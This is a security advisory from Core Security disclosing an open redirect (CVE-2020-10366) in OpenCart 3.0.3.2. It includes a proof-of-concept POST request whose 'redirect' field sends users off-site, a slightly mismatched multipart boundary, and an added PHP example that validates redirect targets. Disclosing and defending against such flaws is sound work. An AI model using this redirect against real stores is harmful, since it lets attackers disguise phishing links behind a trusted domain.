Open Redirect in OpenCart

1. Advisory Information

Title: Open Redirect in OpenCart
Advisory ID: CORE-2020-0006
Advisory URL: https://www.coresecurity.com/advisories/open-redirect-opencart
Date published: 2020-05-04
Date of last update: 2020-05-04
Vendors contacted: OpenCart
Release mode: Forced release

2. Vulnerability Information

Class: URL Redirection to Untrusted Site (Open Redirect) [CWE-601]
Impact: Phishing attacks
Remotely Exploitable: Yes 
Locally Exploitable: No
CVE Name: CVE-2020-10366

3. Vulnerability Description

OpenCart [1] is an open source PHP-based online store management system. It can be used to create an online shopping framework, providing both a front-end store for customers and a full e-commerce platform for owners with administrative, inventory, and reporting capabilities. There are hundreds of community-built add-ons for additional functionality.

An open redirect was discovered in the web application: it accepts a redirection to an external site without validating the user-supplied input.

4. Vulnerable Packages

  • Version 3.0.3.2

Other versions might be affected, but they were not tested.

5. Vendor Information, Solutions, and Workarounds

No patches or new versions have been released to fix the reported issue.

6. Credits

This vulnerability was discovered and researched by Matias Mevied from Core Security Consulting Services Team.

The publication of this advisory was coordinated by Pablo Zurro from the CoreLabs Advisories Team.

7. Technical Description / Proof of Concept Code

[CVE-2020-10366] An attacker could use a specially crafted link to a page of OpenCart to redirect a user to an arbitrary web page of the attacker’s choice. This allows the attacker to mask a phishing attack with a trusted-looking link since the page appears to be under the domain where OpenCart is installed.

The following proof of concept shows how the redirection is performed:

    POST /index.php?route=common/currency/currency HTTP/1.1
    Host: 172.16.93.133
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Referer: http://localhost/index.php?route=product%2fproduct&manufacturer_id=8&product_id=45
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYV0s5w4r
    Content-Length: 233
    Cookie: OCSESSID=10b302c7525052481e13d6fa5c; language=en-gb; currency=USD

    ------WebKitFormBoundaryYV0s5w4r
    Content-Disposition: form-data; name="code"

    ------WebKitFormBoundaryYV0s5wcon
    Content-Disposition: form-data; name="redirect"

    http://www.coresecurity.com
    ------WebKitFormBoundaryYV0s5w4r--

    HTTP/1.1 302 Found
    Date: Thu, 06 Feb 2020 13:44:25 GMT
    Server: Apache/2.4.41 (Unix) OpenSSL/1.1.1d PHP/7.4.1 mod_perl/2.0.8-dev Perl/v5.16.3
    X-Powered-By: PHP/7.4.1
    Set-Cookie: OCSESSID=10b302c7525052481e13d6fa5c; path=/
    Location: http://www.coresecurity.com
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8

In the above example, the HTTP 302 response redirects the user to http://www.coresecurity.com.
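
One way to constrain the `redirect` value to the store's own host, shown as an added example that is not OpenCart code or a vendor fix. The function name, the `$storeHost` parameter and the fallback route are assumptions; the sample targets reuse the host and URL from the proof of concept.

```php
<?php
// Added example, not OpenCart code. Function name, $storeHost and the
// fallback route are assumptions made for illustration.

function safe_redirect_target(string $target, string $storeHost,
                              string $fallback = '/index.php?route=common/home'): string
{
    // Browsers and parse_url() disagree on backslashes, whitespace and
    // control characters, so refuse any target containing them.
    if ($target === '' || preg_match('/[\x00-\x20\x7f\\\\]/', $target)) {
        return $fallback;
    }

    $parts = parse_url($target);
    if ($parts === false) {
        return $fallback;
    }

    // Relative reference: accept only a path rooted at a single "/".
    if (!isset($parts['scheme']) && !isset($parts['host'])) {
        $rooted = $target[0] === '/' && substr($target, 0, 2) !== '//';
        return $rooted ? $target : $fallback;
    }

    // Absolute URL: http(s) only, no userinfo, host must be the store itself.
    $scheme = strtolower($parts['scheme'] ?? '');
    $host   = strtolower($parts['host'] ?? '');
    if (!in_array($scheme, ['http', 'https'], true) || isset($parts['user'])) {
        return $fallback;
    }
    return $host === strtolower($storeHost) ? $target : $fallback;
}

// Constructed inputs: the store host and the off-site target are the values
// shown in the proof of concept above.
$store = '172.16.93.133';
$samples = [
    'http://172.16.93.133/index.php?route=product/product&product_id=45',
    '/index.php?route=checkout/cart',
    'http://www.coresecurity.com',
    '//www.coresecurity.com/',
    'http://172.16.93.133@www.coresecurity.com/',
];
foreach ($samples as $s) {
    printf("%-70s => %s\n", $s, safe_redirect_target($s, $store));
}
```

The check belongs at the point where the posted `redirect` field is turned into a `Location` header, so that only same-host targets survive and everything else falls back to a fixed page.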

8. Report Timeline

2020-01-10 - Vulnerability discovered by CoreLabs.

2020-03-27 - Email sent to OpenCart to ask about the correct contact for reporting the advisory.

2020-03-27 - Ticket #254509 opened at OpenCart.

2020-04-07 - Ticket closed on their side. They are not interested in pursuing this issue.

2020-04-07 - CVE requested from Mitre and provided. We pivot to forced release. CVE-2020-10366 will be used.

2020-04-30 - OpenCart is informed about the publication of the forced release.

2020-05-04 - Advisory published.

9. References

[1] https://www.opencart.com/

10. About CoreLabs

CoreLabs, the research center of Core Security, A HelpSystems Company, is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and disclose vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at https://www.coresecurity.com/core-labs.

11. About Core Security, A HelpSystems Company

Core Security, a HelpSystems Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@helpsystems.com.

12. Disclaimer

The contents of this advisory are copyright (c) 2020 Core Security and (c) 2020 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/